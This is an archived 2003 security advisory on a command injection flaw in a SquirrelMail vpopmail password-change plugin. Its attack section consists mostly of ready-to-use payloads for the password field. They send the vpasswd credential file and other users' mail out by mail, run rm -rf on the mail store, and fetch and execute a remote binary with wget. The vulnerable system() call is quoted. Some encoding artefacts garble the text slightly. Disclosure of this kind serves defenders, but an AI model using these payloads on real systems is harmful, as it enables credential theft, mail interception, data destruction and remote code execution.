Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: a6057.htm

VPOPMail Account Administration (squirrel mail) arbitrary remote command execution



12th Mar 2003 [SBWID-6057]
COMMAND

	VPOPMail  Account  Administration  (squirrel  mail)   arbitrary   remote
	command execution

SYSTEMS AFFECTED

	current version

PROBLEM

	error  [error@lostinthenoise.net]  reported  following  interesting  bug
	about VPOPMail Account Administration,  a  squirellmail  plugin  to  let
	user   do   the   tasks   he   would   be    able    using    qmailadmin
	[http://www.squirrelmail.org/plugin_view.php?id=3D103].
	
	Notes (from the README):
	
	
	************* IMPORTANT ************
	    For the plugin to work correctly, the Web-Server needs to run as
	same user
	    as vpopmail does (most common: user vpopmail)
	    this is because the plugin needs write-permissions to the users
	Maildir to
	    - create appropriate .qmail-files
	    - create away - messages
	
	
	
	This (allowing anything to be excuted as the web user) of  course  is  a
	huge security hole. This actually goes beyond that and says to  run  the
	web server as vpopmail!
	
	Amazing! These people are far too trusting of their users.
	
	Bad idea. What could be worse?
	
	How about making it even easier to exploit every vpopmail binary?
	
	How? Unclean input parsing!
	
	If the vpopmail user is the same as the webuser  you  get  to  have  fun
	with:
	
	vaddaliasdomain  vconvert         vdominfo         vpasswd
	vadddomain       vdeldomain       vipmap           vpopbull
	vadduser         vdelivermail     vkill            vqmaillocal
	valias           vdeloldusers     vmkpasswd        vsetuserquota
	vchkpw           vdeluser         vmoduser         vuserinfo
	
	
	Basically the exploits are unlimited (as you get full access  rights  to
	vpopmail):
	
	
	#change password
	password;~vpopmail/bin/vpasswd user@host password
	
	#mail password database
	password;cat ~vpopmail/domains/example.com/vpasswd|mail -s owned
	user@host
	
	#remove vpopmail
	password;rm -rf ~vpopmail/
	
	#get listings of mail
	password;ls ~vpopmail/domains/example.com/user/Maildir/new| mail
	user@host
	
	#read any users mail
	passwd;cat
	~vpopmail/domains/example.com/user/Maildir/new//1027359339.48628.example.co=
	m\,S\=3D2432 | mail user@host
	
	#execute other arbatrary code on server
	passwd; wget example.com/exploit -O /tmp/f;chmod +x /tmp/f;/tmp/f;
	
	
	Here is the offending code (line 45 in vpopmail.php):
	
	
	system("$vpasswd $username $pwd");
	
	
	As we can see, this is very bad.
	
	Very bad security model (running your webserver as vpopmail)  backed  up
	by s= loppy coding (passing user entered data into the shell  unescaped)
	=3D=3D ba= d bad bad.
	
	So you just pass anything I wrote above (or really anything at all  that
	you desire) and you own the systems vpopmail config.
	
	Enter this data into the password changing field (make sure  it  matches
	up in both) in the squirrel mail vpopmail password section to exploit.
	
	But it's just a plugin to a webmail system, so no big deal ;-)

SOLUTION

	Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH